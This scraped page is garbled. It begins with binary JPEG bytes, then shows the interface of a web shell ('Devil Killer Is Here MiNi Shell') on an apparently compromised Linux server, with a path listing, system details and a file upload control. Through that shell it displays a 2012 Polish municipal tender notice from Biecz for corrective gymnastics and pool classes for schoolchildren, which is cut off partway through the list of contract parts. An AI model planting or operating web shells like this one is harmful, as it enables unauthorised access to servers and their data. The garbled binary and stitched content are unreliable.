JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120222/53564-N-2012.html

<p class="kh_header"><b>Biecz: USŁUGI EDUKACYJNE W RAMACH PROJEKTU: WYGRYWAMY NA STARCIE - DOSTRZEGAMY I POMAGAMY UCZNIOM GMINY BIECZ              W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPÓŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO - GIMNASTYKA KOREKCYJNA I ZAJĘCIA NA BASENIE DLA UCZNIÓW Z WADAMI POSTAWY</b><br>
<b>Numer ogłoszenia: 53564 - 2012; data zamieszczenia: 22.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biecz , Rynek 1, 38-340 Biecz, woj. małopolskie, tel. 013 4471113, faks 013 4471113.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biecz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI EDUKACYJNE W RAMACH PROJEKTU: WYGRYWAMY NA STARCIE - DOSTRZEGAMY I POMAGAMY UCZNIOM GMINY BIECZ              W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI WSPÓŁFINANSOWANEGO ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO - GIMNASTYKA KOREKCYJNA I ZAJĘCIA NA BASENIE DLA UCZNIÓW Z WADAMI POSTAWY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi edukacyjne w ramach projektu WYGRYWAMY NA STARCIE - dostrzegamy i pomagamy uczniom Gminy Biecz w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego - gimnastyka korekcyjna i zajęcia na basenie dla uczniów z wadami postawy

2.   Szczegółowy opis przedmiotu zamówienia:
2.1. Przedmiotem zamówienia prowadzenie gimnastyki korekcyjnej i zajęć na basenie z uczniami klas I-III szkół podstawowych, których celem jest:
-zmniejszenie deficytu w zakresie poszczególnych wad,
-podniesienie ogólnej sprawności i wydolności organizmu,
-wyrobienie nawyku dbania o własną sylwetkę, zdrowie   i sprawność fizyczną,
-integracja grupy biorącej udział w zajęciach.

2.2.  Wykonawca wykonywać będzie powierzone obowiązki w czasie określonym łączną liczbą godzin zajęć,  prowadzonych bezpośrednio po zajęciach lekcyjnych (od poniedziałku do piątku). Zajęcia prowadzone będą  po 60 min.

2.3.    Za bieżący nadzór na realizacją usług odpowiedzialni będą dyrektorzy poszczególnych szkół.

2.4.   Wykonawca zobowiązany będzie do: przeprowadzenie wybranych przez siebie zajęć, dokumentowania zajęć w dzienniku zajęć, prowadzenia kart  - rozliczenie czasu pracy, prowadzenia dokumentacji z zajęć (karty pracy, zdjęcia), przygotowywanie pomocy dydaktycznych na zajęcia,  ewaluacji zajęć w formie pisemnej, prezentacji osiągnięć uczniów, współudziału w organizacji konkursów dla uczniów.

2.5.  Wykonawca zobowiązany będzie do informowania dyrektora danej szkoły w zakresie oceny postępów                      i osiągnięć uczniów uczestniczących w zajęciach.

2.6.  Wykonawca zobowiązany będzie do ochrony powierzonego mienia przed szkodami pod rygorem osobistej odpowiedzialności materialnej z tytułu niedochowania tego obowiązku.

2.7.    Wykonawca ponosi pełną odpowiedzialność za uczniów w trakcie trwania zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania powyższego warunku należy wykazać dysponowanie:
- dla części zamówienia: V, X, XI, XII i XIII  jedną osobą posiadającą ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego oraz roczne doświadczenie w prowadzeniu przedmiotowych zajęć
- dla części zamówienia: I, II, III, IV, VI, VII, VIII i IX jedną osobą posiadającą ukończone studia wyższe minimum licencjackie lub magisterskie z przygotowaniem pedagogicznym i ukończony kurs kwalifikacyjny                      z zakresu gimnastyki korekcyjnej oraz roczne doświadczenie w prowadzeniu przedmiotowych zajęć, lub ukończone studia podyplomowe z zakresu gimnastyki korekcyjnej oraz roczne doświadczenie w prowadzeniu przedmiotowych zajęć.
Na podstawie złożonych dokumentów Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły : spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełnienia wymaganego warunku wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ;
 2) Dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności gospodarczej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie zmian w treści umowy  w przypadku:
a) zmiany miejsca realizacji zajęć - gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy i Zamawiającego. Nowe miejsce realizacji zadania wskazuje Zamawiający.
b) zmiany osoby prowadzącej zajęcia - w przypadku złożenia oferty przez firmę dopuszcza  się  zmiany  osoby  prowadzącej  zajęcia, w przypadku, gdy konieczność zmiany wynika z przyczyn losowych, niezależnych od Wykonawcy (np. śmierć, choroba powyżej 20 dni, rezygnacja, porzucenie pracy, nie wywiązywanie się z obowiązków określonych we wzorze umowy i inne zdarzenia losowe). Nowa osoba  prowadząca  zajęcia  musi  spełniać  wymagania w  zakresie kwalifikacji  określone w ofercie.  
Zmiana umowy następuje na umotywowany wniosek Zamawiającego lub Wykonawcy.
Zmianę umowy dokonuje się w trybie aneksu do umowy podpisanego przez Zamawiającego i Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieczu, 38-340 Biecz ul. Rynek 20, pok. nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 14:30, miejsce: Urząd Miejski w Bieczu, 38-340 Biecz ul. Rynek 20, pok. nr 10 - kancelaria urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego                    i realizowane w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych                         w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć  z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym w Libuszy dla grupy I  w wymiarze 30 godzin w miesiącach III-VI br. i dla grupy II w wymiarze 30 godzin w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć  z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym w Libuszy dla grupy I  w wymiarze 30 godzin w miesiącach III-VI br. i dla grupy II w wymiarze 30 godzin w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół nr 2 w Bieczu 
dla grupy  I w wymiarze 30 godzin w miesiącach III-VI br. i dla grupy II w wymiarze 30 godzin                         w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół nr 2 w Bieczu 
dla grupy  I w wymiarze 30 godzin w miesiącach III-VI br. i dla grupy II w wymiarze 30 godzin                         w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół nr 1 w Bieczu 
dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI br. i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół nr 1 w Bieczu 
dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI br. i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym
w Korczynie dla grupy I w wymiarze 20 godzin w miesiącach III-VI br. i dla grupy I  w wymiarze 17 godzin  w miesiącach  IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym
w Korczynie dla grupy I w wymiarze 20 godzin w miesiącach III-VI br. i dla grupy I  w wymiarze 17 godzin  w miesiącach  IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego  w Strzeszynie dla grupy I w wymiarze 40 godzin  w miesiącach III-VI br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego  w Strzeszynie dla grupy I w wymiarze 40 godzin  w miesiącach III-VI br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół Podstawowych     w Binarowej  dla grupy I, II i III w łącznym wymiarze 54 godziny  w miesiącach III-VI br. i dla I, II i III w łącznym wymiarze 45 godziny  w miesiącach IX-XII br.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkół Podstawowych     w Binarowej  dla grupy I, II i III w łącznym wymiarze 54 godziny  w miesiącach III-VI br. i dla I, II i III w łącznym wymiarze 45 godziny  w miesiącach IX-XII br.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Szkole Podstawowej w Sitnicy dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Szkole Podstawowej w Sitnicy dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach III-VI i dla grupy I i II w łącznym wymiarze 30 godzin w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Szkole Podstawowej                         w Racławicach dla grupy I w wymiarze 36 godzin w miesiącach III-VI i dla grupy II w wymiarze 36 godzin w miesiącach IX-XII br..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Szkole Podstawowej                         w Racławicach dla grupy I w wymiarze 36 godzin w miesiącach III-VI i dla grupy II w wymiarze 36 godzin w miesiącach IX-XII br..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym w Rożnowicach dla grupy I w wymiarze 30 godzin w miesiącach III-VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z gimnastyki korekcyjnej dla uczniów z wadami postawy w Zespole Szkolno - Przedszkolnym w Rożnowicach dla grupy I w wymiarze 30 godzin w miesiącach III-VI.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Prowadzenie zajęć  na basenie dla uczniów z wadami postawy z Zespołu Szkolno - Przedszkolnego w Libuszy dla grupy I w wymiarze 30 godzin w miesiącach III-VI i dla grupy II w wymiarze 30 godzin                             w miesiącach IX-XII br..</p>
